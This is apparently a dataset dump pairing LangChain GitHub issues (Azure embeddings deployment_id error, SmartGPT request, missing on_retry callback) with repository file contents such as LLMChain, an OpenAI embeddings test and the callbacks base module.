prompt_template = "Tell me a {adjective} joke"
prompt = PromptTemplate(
input_variables=["adjective"], template=prompt_template
)
llm = LLMChain(llm=OpenAI(), prompt=prompt)
"""
@property
def lc_serializable(self) -> bool:
return True
prompt: BasePromptTemplate
"""Prompt object to use."""
llm: BaseLanguageModel
"""Language model to call."""
output_key: str = "text" #: :meta private:
output_parser: BaseLLMOutputParser = Field(default_factory=StrOutputParser)
"""Output parser to use.
Defaults to one that takes the most likely string but does not change it
otherwise."""
return_final_only: bool = True
"""Whether to return only the final parsed result. Defaults to True.
If false, will return a bunch of extra information about the generation."""
llm_kwargs: dict = Field(default_factory=dict)
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@property
def input_keys(self) -> List[str]:
"""Will be whatever keys the prompt expects.
:meta private:
"""
return self.prompt.input_variables
@property
def output_keys(self) -> List[str]:
"""Will always return text key.
:meta private:
"""
if self.return_final_only:
return [self.output_key]
else:
return [self.output_key, "full_generation"]
def _call(
self,
inputs: Dict[str, Any],
run_manager: Optional[CallbackManagerForChainRun] = None,
) -> Dict[str, str]:
response = self.generate([inputs], run_manager=run_manager)
return self.create_outputs(response)[0]
def generate(
self,
input_list: List[Dict[str, Any]],
run_manager: Optional[CallbackManagerForChainRun] = None,
) -> LLMResult:
"""Generate LLM result from inputs."""
prompts, stop = self.prep_prompts(input_list, run_manager=run_manager)
return self.llm.generate_prompt(
prompts,
stop,
callbacks=run_manager.get_child() if run_manager else None,
**self.llm_kwargs,
)
async def agenerate(
self,
input_list: List[Dict[str, Any]],
run_manager: Optional[AsyncCallbackManagerForChainRun] = None,
) -> LLMResult:
"""Generate LLM result from inputs."""
prompts, stop = await self.aprep_prompts(input_list, run_manager=run_manager)
return await self.llm.agenerate_prompt(
prompts,
stop,
callbacks=run_manager.get_child() if run_manager else None,
**self.llm_kwargs,
)
def prep_prompts(
self,
input_list: List[Dict[str, Any]],
run_manager: Optional[CallbackManagerForChainRun] = None,
) -> Tuple[List[PromptValue], Optional[List[str]]]:
"""Prepare prompts from inputs."""
stop = None
if "stop" in input_list[0]:
stop = input_list[0]["stop"]
prompts = []
for inputs in input_list:
selected_inputs = {k: inputs[k] for k in self.prompt.input_variables}
prompt = self.prompt.format_prompt(**selected_inputs)
_colored_text = get_colored_text(prompt.to_string(), "green")
_text = "Prompt after formatting:\n" + _colored_text
if run_manager:
run_manager.on_text(_text, end="\n", verbose=self.verbose)
if "stop" in inputs and inputs["stop"] != stop:
raise ValueError(
"If `stop` is present in any inputs, should be present in all."
)
prompts.append(prompt)
return prompts, stop
async def aprep_prompts(
self,
input_list: List[Dict[str, Any]],
run_manager: Optional[AsyncCallbackManagerForChainRun] = None,
) -> Tuple[List[PromptValue], Optional[List[str]]]:
"""Prepare prompts from inputs."""
stop = None
if "stop" in input_list[0]:
stop = input_list[0]["stop"]
prompts = []
for inputs in input_list:
selected_inputs = {k: inputs[k] for k in self.prompt.input_variables}
prompt = self.prompt.format_prompt(**selected_inputs)
_colored_text = get_colored_text(prompt.to_string(), "green")
_text = "Prompt after formatting:\n" + _colored_text
if run_manager:
await run_manager.on_text(_text, end="\n", verbose=self.verbose)
if "stop" in inputs and inputs["stop"] != stop:
raise ValueError(
"If `stop` is present in any inputs, should be present in all."
)
prompts.append(prompt)
return prompts, stop
def apply(
self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None
) -> List[Dict[str, str]]:
"""Utilize the LLM generate method for speed gains."""
callback_manager = CallbackManager.configure(
callbacks, self.callbacks, self.verbose
)
run_manager = callback_manager.on_chain_start(
dumpd(self),
{"input_list": input_list},
)
try:
response = self.generate(input_list, run_manager=run_manager)
except (KeyboardInterrupt, Exception) as e:
run_manager.on_chain_error(e)
raise e
outputs = self.create_outputs(response)
run_manager.on_chain_end({"outputs": outputs})
return outputs
async def aapply(
self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None
) -> List[Dict[str, str]]:
"""Utilize the LLM generate method for speed gains."""
callback_manager = AsyncCallbackManager.configure(
callbacks, self.callbacks, self.verbose
)
run_manager = await callback_manager.on_chain_start(
dumpd(self),
{"input_list": input_list},
)
try:
response = await self.agenerate(input_list, run_manager=run_manager)
except (KeyboardInterrupt, Exception) as e:
await run_manager.on_chain_error(e)
raise e
outputs = self.create_outputs(response)
await run_manager.on_chain_end({"outputs": outputs})
return outputs
@property
def _run_output_key(self) -> str:
return self.output_key
def create_outputs(self, llm_result: LLMResult) -> List[Dict[str, Any]]:
"""Create outputs from response."""
result = [
# Get the text of the top generated string.
{
self.output_key: self.output_parser.parse_result(generation),
"full_generation": generation,
}
for generation in llm_result.generations
]
if self.return_final_only:
result = [{self.output_key: r[self.output_key]} for r in result]
return result
async def _acall(
self,
inputs: Dict[str, Any],
run_manager: Optional[AsyncCallbackManagerForChainRun] = None,
) -> Dict[str, str]:
response = await self.agenerate([inputs], run_manager=run_manager)
return self.create_outputs(response)[0]
def predict(self, callbacks: Callbacks = None, **kwargs: Any) -> str:
"""Format prompt with kwargs and pass to LLM.
Args:
callbacks: Callbacks to pass to LLMChain
**kwargs: Keys to pass to prompt template.
Returns:
Completion from LLM.
Example:
.. code-block:: python
completion = llm.predict(adjective="funny")
"""
return self(kwargs, callbacks=callbacks)[self.output_key]
async def apredict(self, callbacks: Callbacks = None, **kwargs: Any) -> str:
"""Format prompt with kwargs and pass to LLM.
Args:
callbacks: Callbacks to pass to LLMChain
**kwargs: Keys to pass to prompt template.
Returns:
Completion from LLM.
Example:
.. code-block:: python
completion = llm.predict(adjective="funny")
"""
return (await self.acall(kwargs, callbacks=callbacks))[self.output_key]
def predict_and_parse(
self, callbacks: Callbacks = None, **kwargs: Any
) -> Union[str, List[str], Dict[str, Any]]:
"""Call predict and then parse the results."""
warnings.warn(
"The predict_and_parse method is deprecated, "
"instead pass an output parser directly to LLMChain."
)
result = self.predict(callbacks=callbacks, **kwargs)
if self.prompt.output_parser is not None:
return self.prompt.output_parser.parse(result)
else:
return result
async def apredict_and_parse(
self, callbacks: Callbacks = None, **kwargs: Any
) -> Union[str, List[str], Dict[str, str]]:
"""Call apredict and then parse the results."""
warnings.warn(
"The apredict_and_parse method is deprecated, "
"instead pass an output parser directly to LLMChain."
)
result = await self.apredict(callbacks=callbacks, **kwargs)
if self.prompt.output_parser is not None:
return self.prompt.output_parser.parse(result)
else:
return result
def apply_and_parse(
self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None
) -> Sequence[Union[str, List[str], Dict[str, str]]]:
"""Call apply and then parse the results."""
warnings.warn(
"The apply_and_parse method is deprecated, "
"instead pass an output parser directly to LLMChain."
)
result = self.apply(input_list, callbacks=callbacks)
return self._parse_generation(result)
def _parse_generation(
self, generation: List[Dict[str, str]]
) -> Sequence[Union[str, List[str], Dict[str, str]]]:
if self.prompt.output_parser is not None:
return [
self.prompt.output_parser.parse(res[self.output_key])
for res in generation
]
else:
return generation
async def aapply_and_parse(
self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None
) -> Sequence[Union[str, List[str], Dict[str, str]]]:
"""Call apply and then parse the results."""
warnings.warn(
"The aapply_and_parse method is deprecated, "
"instead pass an output parser directly to LLMChain."
)
result = await self.aapply(input_list, callbacks=callbacks)
return self._parse_generation(result)
@property
def _chain_type(self) -> str:
return "llm_chain"
@classmethod
def from_string(cls, llm: BaseLanguageModel, template: str) -> LLMChain:
"""Create LLMChain from LLM and template."""
prompt_template = PromptTemplate.from_template(template)
return cls(llm=llm, prompt=prompt_template)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 5,001 | Azure OpenAI Embeddings failed due to no deployment_id set. | ### System Info
Broken by #4915
Error: `Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.embedding.Embedding'>`
I'm putting a PR out to fix this now.
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run example notebook: https://github.com/hwchase17/langchain/blob/22d844dc0795e7e53a4cc499bf4974cb83df490d/docs/modules/models/text_embedding/examples/azureopenai.ipynb
### Expected behavior
Embedding using Azure OpenAI should work. | https://github.com/langchain-ai/langchain/issues/5001 | https://github.com/langchain-ai/langchain/pull/5002 | 45741bcc1b65e588e560b60e347ab391858d53f5 | 1d3735a84c64549d4ef338506ae0b68d53541b44 | "2023-05-19T20:18:47Z" | python | "2023-08-11T22:43:01Z" | libs/langchain/tests/integration_tests/embeddings/test_openai.py | """Test openai embeddings."""
import numpy as np
import openai
import pytest
from langchain.embeddings.openai import OpenAIEmbeddings
def test_openai_embedding_documents() -> None:
"""Test openai embeddings."""
documents = ["foo bar"]
embedding = OpenAIEmbeddings()
output = embedding.embed_documents(documents)
assert len(output) == 1
assert len(output[0]) == 1536
def test_openai_embedding_documents_multiple() -> None:
"""Test openai embeddings."""
documents = ["foo bar", "bar foo", "foo"]
embedding = OpenAIEmbeddings(chunk_size=2)
embedding.embedding_ctx_length = 8191
output = embedding.embed_documents(documents)
assert len(output) == 3
assert len(output[0]) == 1536
assert len(output[1]) == 1536
assert len(output[2]) == 1536
@pytest.mark.asyncio
async def test_openai_embedding_documents_async_multiple() -> None:
"""Test openai embeddings."""
documents = ["foo bar", "bar foo", "foo"]
embedding = OpenAIEmbeddings(chunk_size=2)
embedding.embedding_ctx_length = 8191
output = await embedding.aembed_documents(documents)
assert len(output) == 3
assert len(output[0]) == 1536
assert len(output[1]) == 1536
assert len(output[2]) == 1536
def test_openai_embedding_query() -> None:
"""Test openai embeddings."""
document = "foo bar"
embedding = OpenAIEmbeddings()
output = embedding.embed_query(document)
assert len(output) == 1536
@pytest.mark.asyncio
async def test_openai_embedding_async_query() -> None:
"""Test openai embeddings."""
document = "foo bar"
embedding = OpenAIEmbeddings()
output = await embedding.aembed_query(document)
assert len(output) == 1536
def test_openai_embedding_with_empty_string() -> None:
"""Test openai embeddings with empty string."""
document = ["", "abc"]
embedding = OpenAIEmbeddings()
output = embedding.embed_documents(document)
assert len(output) == 2
assert len(output[0]) == 1536
expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[
"data"
][0]["embedding"]
assert np.allclose(output[0], expected_output)
assert len(output[1]) == 1536
def test_embed_documents_normalized() -> None:
output = OpenAIEmbeddings().embed_documents(["foo walked to the market"])
assert np.isclose(np.linalg.norm(output[0]), 1.0)
def test_embed_query_normalized() -> None:
output = OpenAIEmbeddings().embed_query("foo walked to the market")
assert np.isclose(np.linalg.norm(output), 1.0)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,463 | `SmartGPT` workflow | ### Feature request
@hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)?
Probably, it is also implemented but I didn't find it.
Thi method looks like something simple but very effective.
### Motivation
Improving the quality of the prompts and the resulting generation quality.
### Your contribution
I can try to implement it but need direction. | https://github.com/langchain-ai/langchain/issues/4463 | https://github.com/langchain-ai/langchain/pull/4816 | 1d3735a84c64549d4ef338506ae0b68d53541b44 | 8aab39e3ce640c681bbdc446ee40f7e34a56cc52 | "2023-05-10T15:52:11Z" | python | "2023-08-11T22:44:27Z" | docs/extras/use_cases/self_check/smart_llm.ipynb | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,463 | `SmartGPT` workflow | ### Feature request
@hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)?
Probably, it is also implemented but I didn't find it.
Thi method looks like something simple but very effective.
### Motivation
Improving the quality of the prompts and the resulting generation quality.
### Your contribution
I can try to implement it but need direction. | https://github.com/langchain-ai/langchain/issues/4463 | https://github.com/langchain-ai/langchain/pull/4816 | 1d3735a84c64549d4ef338506ae0b68d53541b44 | 8aab39e3ce640c681bbdc446ee40f7e34a56cc52 | "2023-05-10T15:52:11Z" | python | "2023-08-11T22:44:27Z" | libs/experimental/langchain_experimental/smart_llm/__init__.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,463 | `SmartGPT` workflow | ### Feature request
@hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)?
Probably, it is also implemented but I didn't find it.
Thi method looks like something simple but very effective.
### Motivation
Improving the quality of the prompts and the resulting generation quality.
### Your contribution
I can try to implement it but need direction. | https://github.com/langchain-ai/langchain/issues/4463 | https://github.com/langchain-ai/langchain/pull/4816 | 1d3735a84c64549d4ef338506ae0b68d53541b44 | 8aab39e3ce640c681bbdc446ee40f7e34a56cc52 | "2023-05-10T15:52:11Z" | python | "2023-08-11T22:44:27Z" | libs/experimental/langchain_experimental/smart_llm/base.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,463 | `SmartGPT` workflow | ### Feature request
@hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)?
Probably, it is also implemented but I didn't find it.
Thi method looks like something simple but very effective.
### Motivation
Improving the quality of the prompts and the resulting generation quality.
### Your contribution
I can try to implement it but need direction. | https://github.com/langchain-ai/langchain/issues/4463 | https://github.com/langchain-ai/langchain/pull/4816 | 1d3735a84c64549d4ef338506ae0b68d53541b44 | 8aab39e3ce640c681bbdc446ee40f7e34a56cc52 | "2023-05-10T15:52:11Z" | python | "2023-08-11T22:44:27Z" | libs/experimental/tests/unit_tests/test_smartllm.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,542 | Error: 'OpenAICallbackHandler' object has no attribute 'on_retry'` | ### System Info
**LangChain:** 0.0.248
**Python:** 3.10.10
**OS version:** Linux 5.10.178-162.673.amzn2.x86_64
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
**Code:**
```
try:
with get_openai_callback() as cb:
llm_chain = LLMChain(llm=llm, prompt=prompt_main)
all_text = str(template) + str(prompt) + str(usescases) + str(transcript)
threshold = (llm.get_num_tokens(text=all_text) + 800)
dataframe_copy.loc[index, "Total Tokens"] = threshold
if int(threshold) <= 4000:
chatgpt_output = llm_chain.run({"prompt":prompt, "use_cases_dictionary":usescases, "transcript":transcript})
chatgpt_output = text_post_processing(chatgpt_output)
dataframe_copy.loc[index, "ChatGPT Output"] = chatgpt_output
dataframe_copy.loc[index, "Cost (USD)"] = cb.total_cost
else:
dataframe_copy.loc[index, "ChatGPT Output"] = " "
dataframe_copy.loc[index, "Cost (USD)"] = " "
except Exception as e:
dataframe_copy.loc[index, "ChatGPT Output"] = " "
dataframe_copy.loc[index, "Cost (USD)"] = " "
continue
```
**Error Message:**
`Retrying langchain.chat_models.openai.ChatOpenAI.completion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIError: Bad gateway. {"error":{"code":502,"message":"Bad gateway.","param":null,"type":"cf_bad_gateway"}} 502 {'error': {'code': 502, 'message': 'Bad gateway.', 'param': None, 'type': 'cf_bad_gateway'}} {'Date': 'Mon, 31 Jul 2023 20:24:53 GMT', 'Content-Type': 'application/json', 'Content-Length': '84', 'Connection': 'keep-alive', 'X-Frame-Options': 'SAMEORIGIN', 'Referrer-Policy': 'same-origin', 'Cache-Control': 'private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Expires': 'Thu, 01 Jan 1970 00:00:01 GMT', 'Server': 'cloudflare', 'CF-RAY': '7ef889a50eaca7f3-SYD', 'alt-svc': 'h3=":443"; ma=86400'}.
Error in OpenAICallbackHandler.on_retry callback: 'OpenAICallbackHandler' object has no attribute 'on_retry'`
![bug](https://github.com/langchain-ai/langchain/assets/43797457/9b8025e0-f486-48bb-9d74-fdaa6cef4574)
### Expected behavior
I went through the callback [documentation ](https://api.python.langchain.com/en/latest/callbacks/langchain.callbacks.openai_info.OpenAICallbackHandler.html) and yes the "on_retry" method wasn't included over there. So I guess the team needs to modify the core code for OpenAICallbackHandler because it's calling "on_retry" for some reason. | https://github.com/langchain-ai/langchain/issues/8542 | https://github.com/langchain-ai/langchain/pull/9230 | d0a0d560add6c5bc6ded60be506a87d98bf333c3 | c478fc208ed4c29e979abeb7a532eb4d01431e1b | "2023-07-31T21:01:43Z" | python | "2023-08-14T23:45:17Z" | libs/langchain/langchain/callbacks/base.py | """Base callback handler that can be used to handle callbacks in langchain."""
from __future__ import annotations
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence, Union
from uuid import UUID
if TYPE_CHECKING:
from langchain.schema.agent import AgentAction, AgentFinish
from langchain.schema.document import Document
from langchain.schema.messages import BaseMessage
from langchain.schema.output import LLMResult
class RetrieverManagerMixin:
"""Mixin for Retriever callbacks."""
def on_retriever_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when Retriever errors."""
def on_retriever_end(
self,
documents: Sequence[Document],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when Retriever ends running."""
class LLMManagerMixin:
"""Mixin for LLM callbacks."""
def on_llm_new_token(
self,
token: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run on new LLM token. Only available when streaming is enabled."""
def on_llm_end(
self,
response: LLMResult,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when LLM ends running."""
def on_llm_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when LLM errors."""
class ChainManagerMixin:
"""Mixin for chain callbacks."""
def on_chain_end(
self,
outputs: Dict[str, Any],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when chain ends running."""
def on_chain_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when chain errors."""
def on_agent_action(
self,
action: AgentAction,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run on agent action."""
def on_agent_finish(
self,
finish: AgentFinish,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run on agent end."""
class ToolManagerMixin:
"""Mixin for tool callbacks."""
def on_tool_end(
self,
output: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when tool ends running."""
def on_tool_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run when tool errors."""
class CallbackManagerMixin:
"""Mixin for callback manager."""
def on_llm_start(
self,
serialized: Dict[str, Any],
prompts: List[str],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run when LLM starts running."""
def on_chat_model_start(
self,
serialized: Dict[str, Any],
messages: List[List[BaseMessage]],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run when a chat model starts running."""
raise NotImplementedError(
f"{self.__class__.__name__} does not implement `on_chat_model_start`"
)
def on_retriever_start(
self,
serialized: Dict[str, Any],
query: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run when Retriever starts running."""
def on_chain_start(
self,
serialized: Dict[str, Any],
inputs: Dict[str, Any],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run when chain starts running."""
def on_tool_start(
self,
serialized: Dict[str, Any],
input_str: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run when tool starts running."""
class RunManagerMixin:
"""Mixin for run manager."""
def on_text(
self,
text: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
**kwargs: Any,
) -> Any:
"""Run on arbitrary text."""
class BaseCallbackHandler(
LLMManagerMixin,
ChainManagerMixin,
ToolManagerMixin,
RetrieverManagerMixin,
CallbackManagerMixin,
RunManagerMixin,
):
"""Base callback handler that can be used to handle callbacks from langchain."""
raise_error: bool = False
run_inline: bool = False
@property
def ignore_llm(self) -> bool:
"""Whether to ignore LLM callbacks."""
return False
@property
def ignore_retry(self) -> bool:
"""Whether to ignore retry callbacks."""
return False
@property
def ignore_chain(self) -> bool:
"""Whether to ignore chain callbacks."""
return False
@property
def ignore_agent(self) -> bool:
"""Whether to ignore agent callbacks."""
return False
@property
def ignore_retriever(self) -> bool:
"""Whether to ignore retriever callbacks."""
return False
@property
def ignore_chat_model(self) -> bool:
"""Whether to ignore chat model callbacks."""
return False
class AsyncCallbackHandler(BaseCallbackHandler):
"""Async callback handler that can be used to handle callbacks from langchain."""
async def on_llm_start(
self,
serialized: Dict[str, Any],
prompts: List[str],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> None:
"""Run when LLM starts running."""
async def on_chat_model_start(
self,
serialized: Dict[str, Any],
messages: List[List[BaseMessage]],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run when a chat model starts running."""
raise NotImplementedError(
f"{self.__class__.__name__} does not implement `on_chat_model_start`"
)
async def on_llm_new_token(
self,
token: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run on new LLM token. Only available when streaming is enabled."""
async def on_llm_end(
self,
response: LLMResult,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run when LLM ends running."""
async def on_llm_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run when LLM errors."""
async def on_chain_start(
self,
serialized: Dict[str, Any],
inputs: Dict[str, Any],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> None:
"""Run when chain starts running."""
async def on_chain_end(
self,
outputs: Dict[str, Any],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run when chain ends running."""
async def on_chain_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run when chain errors."""
async def on_tool_start(
self,
serialized: Dict[str, Any],
input_str: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> None:
"""Run when tool starts running."""
async def on_tool_end(
self,
output: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run when tool ends running."""
async def on_tool_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run when tool errors."""
async def on_text(
self,
text: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run on arbitrary text."""
async def on_agent_action(
self,
action: AgentAction,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run on agent action."""
async def on_agent_finish(
self,
finish: AgentFinish,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run on agent end."""
async def on_retriever_start(
self,
serialized: Dict[str, Any],
query: str,
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> None:
"""Run on retriever start."""
async def on_retriever_end(
self,
documents: Sequence[Document],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run on retriever end."""
async def on_retriever_error(
self,
error: Union[Exception, KeyboardInterrupt],
*,
run_id: UUID,
parent_run_id: Optional[UUID] = None,
tags: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Run on retriever error."""
class BaseCallbackManager(CallbackManagerMixin):
"""Base callback manager that handles callbacks from LangChain."""
def __init__(
self,
handlers: List[BaseCallbackHandler],
inheritable_handlers: Optional[List[BaseCallbackHandler]] = None,
parent_run_id: Optional[UUID] = None,
*,
tags: Optional[List[str]] = None,
inheritable_tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
inheritable_metadata: Optional[Dict[str, Any]] = None,
) -> None:
"""Initialize callback manager."""
self.handlers: List[BaseCallbackHandler] = handlers
self.inheritable_handlers: List[BaseCallbackHandler] = (
inheritable_handlers or []
)
self.parent_run_id: Optional[UUID] = parent_run_id
self.tags = tags or []
self.inheritable_tags = inheritable_tags or []
self.metadata = metadata or {}
self.inheritable_metadata = inheritable_metadata or {}
@property
def is_async(self) -> bool:
"""Whether the callback manager is async."""
return False
def add_handler(self, handler: BaseCallbackHandler, inherit: bool = True) -> None:
"""Add a handler to the callback manager."""
if handler not in self.handlers:
self.handlers.append(handler)
if inherit and handler not in self.inheritable_handlers:
self.inheritable_handlers.append(handler)
def remove_handler(self, handler: BaseCallbackHandler) -> None:
"""Remove a handler from the callback manager."""
self.handlers.remove(handler)
self.inheritable_handlers.remove(handler)
def set_handlers(
self, handlers: List[BaseCallbackHandler], inherit: bool = True
) -> None:
"""Set handlers as the only handlers on the callback manager."""
self.handlers = []
self.inheritable_handlers = []
for handler in handlers:
self.add_handler(handler, inherit=inherit)
def set_handler(self, handler: BaseCallbackHandler, inherit: bool = True) -> None:
"""Set handler as the only handler on the callback manager."""
self.set_handlers([handler], inherit=inherit)
def add_tags(self, tags: List[str], inherit: bool = True) -> None:
for tag in tags:
if tag in self.tags:
self.remove_tags([tag])
self.tags.extend(tags)
if inherit:
self.inheritable_tags.extend(tags)
def remove_tags(self, tags: List[str]) -> None:
for tag in tags:
self.tags.remove(tag)
self.inheritable_tags.remove(tag)
def add_metadata(self, metadata: Dict[str, Any], inherit: bool = True) -> None:
self.metadata.update(metadata)
if inherit:
self.inheritable_metadata.update(metadata)
def remove_metadata(self, keys: List[str]) -> None:
for key in keys:
self.metadata.pop(key)
self.inheritable_metadata.pop(key)
Callbacks = Optional[Union[List[BaseCallbackHandler], BaseCallbackManager]]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,542 | Error: 'OpenAICallbackHandler' object has no attribute 'on_retry'` | ### System Info
**LangChain:** 0.0.248
**Python:** 3.10.10
**OS version:** Linux 5.10.178-162.673.amzn2.x86_64
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
**Code:**
```
try:
with get_openai_callback() as cb:
llm_chain = LLMChain(llm=llm, prompt=prompt_main)
all_text = str(template) + str(prompt) + str(usescases) + str(transcript)
threshold = (llm.get_num_tokens(text=all_text) + 800)
dataframe_copy.loc[index, "Total Tokens"] = threshold
if int(threshold) <= 4000:
chatgpt_output = llm_chain.run({"prompt":prompt, "use_cases_dictionary":usescases, "transcript":transcript})
chatgpt_output = text_post_processing(chatgpt_output)
dataframe_copy.loc[index, "ChatGPT Output"] = chatgpt_output
dataframe_copy.loc[index, "Cost (USD)"] = cb.total_cost
else:
dataframe_copy.loc[index, "ChatGPT Output"] = " "
dataframe_copy.loc[index, "Cost (USD)"] = " "
except Exception as e:
dataframe_copy.loc[index, "ChatGPT Output"] = " "
dataframe_copy.loc[index, "Cost (USD)"] = " "
continue
```
**Error Message:**
